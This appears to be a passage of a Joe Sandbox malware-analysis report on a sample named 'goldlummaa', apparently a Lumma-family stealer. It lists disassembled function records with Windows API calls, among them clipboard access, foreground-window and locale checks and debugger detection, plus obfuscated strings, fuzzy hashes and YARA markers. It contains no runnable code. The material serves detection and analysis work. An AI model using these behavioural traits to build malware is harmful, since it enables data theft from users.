                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                  • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                  • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                  • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 840 435029-43508b call 43c280 call 414060 * 2 GetUserDefaultUILanguage 847 43508d-435090 840->847 848 435092-4350d8 847->848 849 4350da-435105 847->849 848->847
                                                                                                                  APIs
                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 0043506A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DefaultLanguageUser
                                                                                                                  • String ID: YEBC
                                                                                                                  • API String ID: 95929093-3431656882
                                                                                                                  • Opcode ID: 8ac130dfaadfe82b75f091877a6d2dcf518d6fd967cef73678a972276d03bea7
                                                                                                                  • Instruction ID: 50c9b6870619a2d52b33c232580151561f311758e889b6f4fbf89baf68918320
                                                                                                                  • Opcode Fuzzy Hash: 8ac130dfaadfe82b75f091877a6d2dcf518d6fd967cef73678a972276d03bea7
                                                                                                                  • Instruction Fuzzy Hash: 9321B0B2E015658FDB19DF3CCC512ADBAF16B89310F0942BDE55AE7381CA388E00CB94

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 850 43ab0b-43ab1f 851 43ab20-43ab7b 850->851 851->851 852 43ab7d-43abce GetForegroundWindow call 43c7d0 851->852
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID: ilmn
                                                                                                                  • API String ID: 2020703349-1560153188
                                                                                                                  • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                  • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                  • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                  • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                  • Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
                                                                                                                  • Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                  • Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7
                                                                                                                  APIs
                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 781189d5fc44d07fd0e1f4904dd1cba3305d7db9618452ca2d76d837220d8f17
                                                                                                                  • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                  • Opcode Fuzzy Hash: 781189d5fc44d07fd0e1f4904dd1cba3305d7db9618452ca2d76d837220d8f17
                                                                                                                  • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: c163bcb05f7634e1a4fef36e32eb0508205d9d1b34f8db2584493d2ec9bc581a
                                                                                                                  • Instruction ID: 73dc07478978cc97b4fa8368d249e84189bb1c85d8b76e8a997a211bfaa32886
                                                                                                                  • Opcode Fuzzy Hash: c163bcb05f7634e1a4fef36e32eb0508205d9d1b34f8db2584493d2ec9bc581a
                                                                                                                  • Instruction Fuzzy Hash: C9F0B7B41087018FD314DF28D4A8B1ABBE0EB89304F01881DE4968B3A0DB75AA49CF82
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: ae4746ac1eb4dc45c24d96bd750e06fb844a26f4889db438f9403698b48dbf3c
                                                                                                                  • Instruction ID: c20a79fc710e9b772a2336fa53249e87931ee1b57b699406dbd778e39ad0b615
                                                                                                                  • Opcode Fuzzy Hash: ae4746ac1eb4dc45c24d96bd750e06fb844a26f4889db438f9403698b48dbf3c
                                                                                                                  • Instruction Fuzzy Hash: 5DF098B4509342CFD314DF29C5A871BBBE0BBC4304F10892DE4958B290C7B59949CF86
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2020703349-0
                                                                                                                  • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                  • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                  • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                  • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                  APIs
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 640775948-0
                                                                                                                  • Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                  • Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
                                                                                                                  • Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                  • Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3298025750-0
                                                                                                                  • Opcode ID: 972951d19d2b685253a3b5f37760d17634b32559eba37820a325e3d7b0dff9ca
                                                                                                                  • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                  • Opcode Fuzzy Hash: 972951d19d2b685253a3b5f37760d17634b32559eba37820a325e3d7b0dff9ca
                                                                                                                  • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00438E55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                  • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                  • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                  • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                  • String ID: ($P$W$]$j$x
                                                                                                                  • API String ID: 2832541153-1642767450
                                                                                                                  • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                  • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                  • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                  • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                  • API String ID: 0-2246970021
                                                                                                                  • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                  • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                  • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                  • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *mB$67$@iB$V3R5
                                                                                                                  • API String ID: 0-119712241
                                                                                                                  • Opcode ID: 580e8cf0a12e00fa1f36186f19b506b71ff840fcc0f6e836628e4f566f146029
                                                                                                                  • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                  • Opcode Fuzzy Hash: 580e8cf0a12e00fa1f36186f19b506b71ff840fcc0f6e836628e4f566f146029
                                                                                                                  • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419CD6
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419D3B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                                  • String ID: ,)*k$I,~M
                                                                                                                  • API String ID: 764372645-936430989
                                                                                                                  • Opcode ID: 409457163dc21f8bbcfc449a1199c6fa7c708d9abd1c96867b818197b9c04ebc
                                                                                                                  • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                  • Opcode Fuzzy Hash: 409457163dc21f8bbcfc449a1199c6fa7c708d9abd1c96867b818197b9c04ebc
                                                                                                                  • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                  • API String ID: 0-2430453506
                                                                                                                  • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                  • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                  • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                  • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-3264166258
                                                                                                                  • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                  • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                  • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                  • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -$C\$Iz$[^$de
                                                                                                                  • API String ID: 0-3020956940
                                                                                                                  • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                  • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                  • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                  • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-923305466
                                                                                                                  • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                  • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                  • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                  • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-923305466
                                                                                                                  • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                  • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                  • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                  • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-923305466
                                                                                                                  • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                  • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                  • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                  • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                  APIs
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6C03B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  • Opcode ID: 70847c87b908b640aec5e551f86c9b078fd5586ef18c3ec4b20d90a015b5aada
                                                                                                                  • Instruction ID: 32d7f3d584145d55f497afef2134fa98db052c4f1e0f86b337cf88ddd0a7a708
                                                                                                                  • Opcode Fuzzy Hash: 70847c87b908b640aec5e551f86c9b078fd5586ef18c3ec4b20d90a015b5aada
                                                                                                                  • Instruction Fuzzy Hash: 4471D1B5905128AFDF30AF68CCC9ABEB7B8AB05300F1441D9E058E7252EB314EC59F11
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C65033
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00C650FF
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C65118
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00C65122
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  • Opcode ID: c8d50878ab34e04dc6952cb614d136101c9359d68544a310185e8a492ab318dc
                                                                                                                  • Instruction ID: 2a1c59e72245fffbd21885f4ccb2ffdf4baf5f9aff0982ca9a9f2590486e9e88
                                                                                                                  • Opcode Fuzzy Hash: c8d50878ab34e04dc6952cb614d136101c9359d68544a310185e8a492ab318dc
                                                                                                                  • Instruction Fuzzy Hash: 2931D575D05219DBDF21DFA4D9897CDBBB8BF08300F1041AAE50DAB250EB719B889F45
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &-$)R_X$[O_[$zusR
                                                                                                                  • API String ID: 0-3432275560
                                                                                                                  • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                  • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                  • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                  • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                  • API String ID: 0-2418547040
                                                                                                                  • Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                  • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                  • Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                  • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 67$V3R5$dB
                                                                                                                  • API String ID: 0-2543814982
                                                                                                                  • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                  • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                  • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                  • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
